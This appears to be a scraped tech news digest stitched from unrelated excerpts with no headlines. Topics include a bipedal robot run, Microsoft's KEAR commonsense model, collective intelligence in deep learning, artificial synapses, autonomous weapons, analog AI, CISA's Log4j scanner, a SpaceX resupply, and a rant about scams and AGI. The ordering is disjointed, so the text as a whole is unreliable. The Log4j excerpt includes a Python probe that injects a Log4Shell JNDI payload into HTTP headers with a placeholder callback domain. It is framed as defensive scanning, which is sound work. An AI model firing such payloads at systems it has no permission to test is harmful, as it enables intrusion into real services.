
Agility Robotics’ Cassie just became the first bipedal robot to complete an outdoor 5K run — and it did so untethered and on a single charge.

The challenge: To create robots that can seamlessly integrate into our world, it makes sense to design those robots to walk like we do. That should make it easier for them to navigate our homes and workplaces.

KEAR (Knowledgeable External Attention for commonsense Reasoning), along with recent milestones in computer vision and neural text-to-speech, is part of a larger Azure AI mission to provide relevant, meaningful AI solutions and services that work better for people because they better capture how people learn and work, with improved vision, knowledge understanding, and speech capabilities. At the center of these efforts is XYZ-code, a joint representation of three cognitive attributes: monolingual text (X), audio or visual sensory signals (Y), and multilingual (Z). For more information about these efforts, read the XYZ-code blog post.

Last month, our Azure Cognitive Services team, comprising researchers and engineers with expertise in AI, achieved a groundbreaking milestone by advancing commonsense language understanding. When given a question that requires drawing on prior knowledge and five answer choices, our latest model, KEAR (Knowledgeable External Attention for commonsense Reasoning), performs better than people answering the same question, with human performance calculated as the majority vote among five individuals. KEAR reaches an accuracy of 89.4 percent on the CommonsenseQA leaderboard, compared with 88.9 percent human accuracy. While the CommonsenseQA benchmark is in English, we follow a similar technique for multilingual commonsense reasoning and topped the X-CSR leaderboard.

Although recent large deep learning models trained with big data have made significant breakthroughs in natural language understanding, they still struggle with commonsense knowledge about the world, information that we, as people, have gathered in our day-to-day lives over time. Commonsense knowledge is often absent from task input but is crucial for language understanding. For example, take the question “What is a treat that your dog will enjoy?” To select an answer from the choices salad, petted, affection, bone, and lots of attention, we need to know that dogs generally enjoy food such as bones for a treat. Thus, the best answer would be “bone.” Without this external knowledge, even large-scale models may generate incorrect answers. For example, the DeBERTa language model selects “lots of attention,” which is not as good an answer as “bone.”
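At a high level, KEAR’s “external attention” works by retrieving relevant commonsense text and letting the model read it alongside the question and each candidate answer before scoring. The toy Python sketch below illustrates that pattern only; the hand-written knowledge table and keyword-counting scorer are stand-ins for KEAR’s actual retrieval sources (a knowledge graph, a dictionary, and related training examples) and its DeBERTa-based scorer, and none of the names below come from the real codebase.

```python
# Hypothetical sketch of the KEAR idea: retrieve external commonsense text for
# each answer choice and let the scorer see it next to the question. The
# knowledge table and scorer are illustrative placeholders, not Microsoft's
# implementation.

KNOWLEDGE = {
    "bone": "dogs chew bones and enjoy them as a treat",
    "salad": "a salad is a vegetable dish usually eaten by people",
    "petted": "being petted is an action, not something eaten",
    "affection": "affection is an emotion shown toward others",
    "lots of attention": "attention is focus given to someone",
}

def retrieve_knowledge(choice: str) -> str:
    """Stand-in for the knowledge-retrieval step."""
    return KNOWLEDGE.get(choice, "")

def score(question: str, choice: str, knowledge: str) -> float:
    """Stand-in for the language-model scorer. A real system would feed the
    concatenated question, choice, and knowledge to a model such as DeBERTa;
    here we just count question keywords that reappear in the evidence."""
    evidence = f"{choice} {knowledge}".lower()
    return sum(word in evidence for word in ("dog", "treat", "enjoy"))

def answer(question: str, choices: list[str]) -> str:
    # "External attention" by concatenation: the scorer sees the question, the
    # choice, and the retrieved knowledge together when ranking each option.
    return max(choices, key=lambda c: score(question, c, retrieve_knowledge(c)))

question = "What is a treat that your dog will enjoy?"
choices = ["salad", "petted", "affection", "bone", "lots of attention"]
print(answer(question, choices))  # -> "bone"
```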

The contemporaneous development in recent years of deep neural networks, hardware accelerators with large memory capacity, and massive training datasets has advanced the state of the art on tasks in fields such as computer vision and natural language processing. Today’s deep learning (DL) systems, however, remain prone to issues such as poor robustness, an inability to adapt to novel task settings, and rigid, inflexible configuration assumptions. This has led researchers to explore incorporating ideas from the collective intelligence observed in complex systems into DL methods, to produce models that are more robust and adaptable and make fewer rigid environmental assumptions.

In the new paper Collective Intelligence for Deep Learning: A Survey of Recent Developments, a Google Brain research team surveys historical and recent neural network research on complex systems and the incorporation of collective intelligence principles to advance the capabilities of deep neural networks.

Collective intelligence can manifest in complex systems as self-organization, emergent behaviours, swarm optimization, and cellular systems; and such self-organizing behaviours can also naturally arise in artificial neural networks. The paper identifies and explores four DL areas that show close connections with collective intelligence: image processing, deep reinforcement learning, multi-agent learning, and meta-learning.

A research team, led by Assistant Professor Desmond Loke from the Singapore University of Technology and Design (SUTD), has developed a new type of artificial synapse based on two-dimensional (2D) materials for highly scalable brain-inspired computing.

Brain-inspired computing, which mimics how the human brain functions, has drawn significant scientific attention because of its uses in artificial intelligence and its low energy consumption. For brain-inspired computing to work, artificial synapses that remember the connections between two neurons are necessary, much as they are in the biological brain.

In developing brains, synapses can be grouped into functional synapses and silent synapses: functional synapses are active, while silent synapses are inactive under normal conditions. When silent synapses are activated, they can help optimize the connections between neurons. However, because artificial synapses built with conventional technologies typically occupy large areas, hardware efficiency and cost are usually limited. As the human brain contains about a hundred trillion synapses, the hardware cost must be reduced before such computing can be applied to smart portable devices and Internet of Things (IoT) devices.

Autonomous weapon systems—commonly known as killer robots—may have killed human beings for the first time ever last year, according to a recent United Nations Security Council report on the Libyan civil war. History could well identify this as the starting point of the next major arms race, one that has the potential to be humanity’s final one.

The United Nations Convention on Certain Conventional Weapons debated the question of banning autonomous weapons at its once-every-five-years review meeting in Geneva Dec. 13–17, 2021, but didn’t reach consensus on a ban. Established in 1983, the convention has been updated regularly to restrict some of the world’s cruelest conventional weapons, including land mines, booby traps and incendiary weapons.

Autonomous weapon systems are robots with lethal weapons that can operate independently, selecting and attacking targets without a human weighing in on those decisions. Militaries around the world are investing heavily in autonomous weapons research and development. The U.S. alone budgeted US$18 billion for autonomous weapons between 2016 and 2020.

Some of the best circuits to drive AI in the future may be analog, not digital, and research teams around the world are increasingly developing new devices to support such analog AI.

The most basic computation in the deep neural networks driving the current explosion in AI is the multiply-accumulate (MAC) operation. Deep neural networks are composed of layers of artificial neurons; in a MAC operation, the outputs of one layer are multiplied by the strengths, or “weights,” of the connections to the next layer, and each neuron in the next layer sums up these contributions.
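As a concrete, if toy, illustration, the short sketch below spells out the multiply-accumulate arithmetic behind a single dense layer. The shapes and values are arbitrary; real networks dispatch the same computation as large matrix multiplications on specialized hardware.

```python
import numpy as np

# Illustrative sketch only: one dense layer reduced to explicit
# multiply-accumulate (MAC) operations. Sizes and values are made up.

rng = np.random.default_rng(0)
x = rng.random(4)          # outputs of the previous layer (4 neurons)
W = rng.random((3, 4))     # connection weights to the next layer (3 neurons)

# Each output neuron j computes sum_i W[j, i] * x[i]: one multiply and one
# accumulate per connection.
y_mac = np.zeros(3)
for j in range(3):
    for i in range(4):
        y_mac[j] += W[j, i] * x[i]

# The same computation expressed as a matrix-vector product.
y_vec = W @ x
assert np.allclose(y_mac, y_vec)
```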

Modern computers have digital components devoted to MAC operations, but analog circuits theoretically can perform these computations for orders of magnitude less energy. This strategy—known as analog AI, compute-in-memory or processing-in-memory—often performs these multiply-accumulate operations using non-volatile memory devices such as flash, magnetoresistive RAM (MRAM), resistive RAM (RRAM), phase-change memory (PCM) and even more esoteric technologies.
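In a compute-in-memory scheme, the weights are stored as the conductances of memory cells in a crossbar array: applying the layer inputs as voltages makes each output line’s current equal to a multiply-accumulate result, with Ohm’s law doing the multiplies and Kirchhoff’s current law doing the sums. The snippet below is a highly simplified numerical sketch of that idea, ignoring device noise, non-linearity, and the analog-to-digital conversion a real chip would need; the conductance scale is an arbitrary assumption.

```python
import numpy as np

# Highly simplified model of an analog crossbar MAC: weights become cell
# conductances, inputs become applied voltages, and each output line's current
# is a multiply-accumulate result. Real devices add noise, drift and
# quantization, which this sketch ignores.

rng = np.random.default_rng(1)
weights = rng.random((3, 4))     # target layer weights (3 outputs, 4 inputs)
inputs = rng.random(4)           # layer inputs

g_max = 1e-4                          # assumed maximum cell conductance (siemens)
conductances = weights * g_max        # program each weight as a conductance
voltages = inputs                     # encode each input as a voltage (volts)

# Ohm's law per cell (I = G * V); Kirchhoff's law per output line (currents add).
output_currents = conductances @ voltages

# Rescaling the currents recovers the digital MAC result.
assert np.allclose(output_currents / g_max, weights @ inputs)
```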

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.

“log4j-scanner is a project derived from other members of the open-source community by CISA’s Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities,” the cybersecurity agency explains.

This scanning solution builds upon similar tools, including an automated scanning framework for the CVE-2021-44228 bug (dubbed Log4Shell) developed by cybersecurity company FullHunt.
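Scanners in this family generally work the same way: they inject a JNDI lookup string carrying a unique token into common HTTP headers, then check an out-of-band DNS logging service to see which targets resolved that token. The sketch below is a generic, hypothetical illustration of the probe step, not the CISA tool’s actual code; the callback domain and header list are placeholders, and it should only ever be pointed at systems you are authorized to test.

```python
import uuid
import requests  # third-party: pip install requests

# Hypothetical sketch of the probe step used by Log4Shell scanners. A unique
# token is embedded in a JNDI lookup payload sent in common headers; a
# vulnerable service would trigger a DNS lookup of that token against the
# callback domain, which you would observe on an out-of-band DNS logger you
# control. Scan only systems you have permission to test.

CALLBACK_DOMAIN = "callback.example.com"   # placeholder for your OOB listener

def probe(url: str) -> str:
    token = uuid.uuid4().hex[:12]
    payload = f"${{jndi:ldap://{token}.{CALLBACK_DOMAIN}/a}}"
    headers = {
        "User-Agent": payload,
        "Referer": payload,
        "X-Api-Version": payload,
    }
    requests.get(url, headers=headers, timeout=5)
    return token  # later, check whether this token appeared in your DNS logs
```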

A turkey dinner and presents arrived in time for the holidays.


CAPE CANAVERAL, Fla. — A SpaceX Dragon capsule arrived at the International Space Station early Wednesday (Dec. 22), carrying with it a holiday haul of science gear and Christmas treats for the astronauts living on the orbital outpost.

The autonomous Dragon resupply ship docked itself at the orbital outpost at 3:41 a.m. EST (0841 GMT), ahead of its planned 4:30 a.m. docking time. It parked itself at the space-facing port on the station’s Harmony module, with NASA astronauts Raja Chari and Tom Marshburn monitoring the docking from inside the station.

This is an interesting rant about how Google, which owns YouTube, refuses to provide basic tools to stop scammers from stealing everyone’s money. This matters because it shows there is going to be virtually NO ONE trying to stop someone from creating an unfriendly AGI or a nanoweapon, etc. Maybe by the one thousandth nanoweapon they would do something, assuming there are any survivors from the first 999 such weapons…

Governments/organizations are very slow to respond to problems.

